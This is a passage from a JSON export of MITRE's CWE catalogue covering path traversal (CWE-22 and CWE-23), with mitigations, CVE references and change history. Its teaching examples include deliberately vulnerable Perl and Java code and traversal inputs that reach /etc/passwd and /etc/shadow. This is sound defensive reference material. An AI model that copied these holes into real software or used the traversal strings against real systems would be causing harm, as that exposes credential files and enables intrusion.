refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy."]}},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-27"},"Intro_Text":"The following code could be for a social networking application in which each user\'s profile information is stored in a separate file. All files are stored in a single directory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $dataPath = \\"/users/cwe/profiles\\";my $username = param(\\"user\\");my $profilePath = $dataPath . \\"/\\" . $username;open(my $fh, \\"<$profilePath\\") || ExitError(\\"profile read error: $profilePath\\");print \\"<ul>\\\\n\\";while (<$fh>) {}print \\"</ul>\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"print \\"<li>$_</li>\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/users/cwe/profiles/../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/etc/passwd"}],"Body_Text":["While the programmer intends to access files such as \\"/users/cwe/profiles/alice\\" or \\"/users/cwe/profiles/bob\\", there is no verification of the incoming user parameter. An attacker could provide a string such as:","The program would generate a profile pathname like this:","When the file is opened, the operating system resolves the \\"../\\" during path canonicalization and actually accesses this file:","As a result, the attacker could read the entire text of the password file.","Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined."]},{"attr":{"@_Demonstrative_Example_ID":"DX-18"},"Intro_Text":"In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String filename = System.getProperty(\\"com.domain.application.dictionaryFile\\");File dictionaryFile = new File(filename);","xhtml:br":""}},"Body_Text":"However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory."},{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]},{"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and once validated delete the given file. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);f.delete()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"/safe_dir/../important.dat"}],"Body_Text":["An attacker could provide an input such as this:","The software assumes that the path is valid because it starts with the \\"/safe_path/\\" sequence, but the \\"../\\" sequence will cause the program to delete the important.dat file in the parent directory"]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"<form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\">Choose a file to upload:<input type=\\"file\\" name=\\"filename\\"/><br/><input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/></form>","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null && contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-0467","Description":"Newsletter module allows reading arbitrary files using \\"../\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0467"},{"Reference":"CVE-2009-4194","Description":"FTP server allows deletion of arbitrary files using \\"..\\" in the DELE command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4194"},{"Reference":"CVE-2009-4053","Description":"FTP server allows creation of arbitrary directories using \\"..\\" in the MKD command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4053"},{"Reference":"CVE-2009-0244","Description":"FTP service for a Bluetooth device allows listing of directories, and creation or reading of files using \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0244"},{"Reference":"CVE-2009-4013","Description":"Software package maintenance program allows overwriting arbitrary files using \\"../\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4013"},{"Reference":"CVE-2009-4449","Description":"Bulletin board allows attackers to determine the existence of files using the avatar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4449"},{"Reference":"CVE-2009-4581","Description":"PHP program allows arbitrary code execution using \\"..\\" in filenames that are fed to the include() function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4581"},{"Reference":"CVE-2010-0012","Description":"Overwrite of files using a .. in a Torrent file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0012"},{"Reference":"CVE-2010-0013","Description":"Chat program allows overwriting files using a custom smiley request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013"},{"Reference":"CVE-2008-5748","Description":"Chain: external control of values for user\'s desired language and theme enables path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5748"},{"Reference":"CVE-2009-1936","Description":"Chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A4","Entry_Name":"Insecure Direct Object Reference","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS00-PL","Entry_Name":"Canonicalize path names before validating them","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":33,"Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-22"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"126"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, "Directory Traversal and Using Parent Paths (..)" Page 370"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-185"}},{"attr":{"@_External_Reference_ID":"REF-186"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Filenames and Paths", Page 503"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-22"}}]},"Notes":{"Note":[{"#text":"Pathname equivalence can be regarded as a type of canonicalization error.","attr":{"@_Type":"Relationship"}},{"#text":"Some pathname equivalence issues are not directly related to directory traversal, rather are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing \\"/\\" on a filename could bypass access rules that don\'t expect a trailing /, causing a server to provide the file when it normally would not).","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use \\"directory traversal\\" only to refer to the injection of \\"..\\" and equivalent sequences whose specific meaning is to traverse directories.","Other variants like \\"absolute pathname\\" and \\"drive letter\\" have the *effect* of directory traversal, but some people may not call it such, since it doesn\'t involve \\"..\\" or equivalent."]},{"#text":"Many variants of path traversal attacks are probably under-studied with respect to root cause. CWE-790 and CWE-182 begin to cover part of this gap.","attr":{"@_Type":"Research Gap"}},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that \\"..\\\\\\" is vulnerable, but not test \\"../\\" which may also be vulnerable.","Any combination of directory separators (\\"/\\", \\"\\\\\\", etc.) and numbers of \\".\\" (e.g. \\"....\\") can produce unique variants; for example, the \\"//../\\" variant is not listed (CVE-2004-0325). See this entry\'s children and lower-level descendants."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Traversal","attr":{"@_Date":"2010-02-16"}}}},"23":{"attr":{"@_ID":"23","@_Name":"Relative Path Traversal","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as \\"..\\" that can resolve to a location that is outside of that directory.","Extended_Description":"This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.","Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59). This includes:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["realpath() in C","getCanonicalPath() in Java","GetFullPath() in ASP.NET","realpath() or abs_path() in Perl","realpath() in PHP"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following URLs are vulnerable to this attack:","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"http://example.com.br/get-files.jsp?file=report.pdfhttp://example.com.br/get-page.php?home=aaa.htmlhttp://example.com.br/some-page.asp?page=index.html","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"http://example.com.br/get-files?file=../../../../somedir/somefilehttp://example.com.br/../../../../etc/shadowhttp://example.com.br/get-files?file=../../../../etc/passwd","xhtml:br":["",""]}}],"Body_Text":"A simple way to execute this attack is like this:"},{"attr":{"@_Demonstrative_Example_ID":"DX-27"},"Intro_Text":"The following code could be for a social networking application in which each user\'s profile information is stored in a separate file. All files are stored in a single directory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $dataPath = \\"/users/cwe/profiles\\";my $username = param(\\"user\\");my $profilePath = $dataPath . \\"/\\" . $username;open(my $fh, \\"<$profilePath\\") || ExitError(\\"profile read error: $profilePath\\");print \\"<ul>\\\\n\\";while (<$fh>) {}print \\"</ul>\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"print \\"<li>$_</li>\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/users/cwe/profiles/../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/etc/passwd"}],"Body_Text":["While the programmer intends to access files such as \\"/users/cwe/profiles/alice\\" or \\"/users/cwe/profiles/bob\\", there is no verification of the incoming user parameter. An attacker could provide a string such as:","The program would generate a profile pathname like this:","When the file is opened, the operating system resolves the \\"../\\" during path canonicalization and actually accesses this file:","As a result, the attacker could read the entire text of the password file.","Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined."]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"<form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\">Choose a file to upload:<input type=\\"file\\" name=\\"filename\\"/><br/><input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/></form>","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null && contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0298","Description":"Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several \\"/../\\" sequences, or several \\"../\\" in a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0298"},{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"},{"Reference":"CVE-2002-0946","Description":"Arbitrary files may be read files via ..\\\\ (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0946"},{"Reference":"CVE-2002-1042","Description":"Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042"},{"Reference":"CVE-2002-1209","Description":"Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in a GET request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1209"},{"Reference":"CVE-2002-1178","Description":"Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via \\"..\\\\\\" sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1178"},{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"},{"Reference":"CVE-2005-2142","Description":"Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a \\"\\\\..\\" sequence in an LS command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2142"},{"Reference":"CVE-2002-0160","Description":"The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a \\"..\\\\..\\" 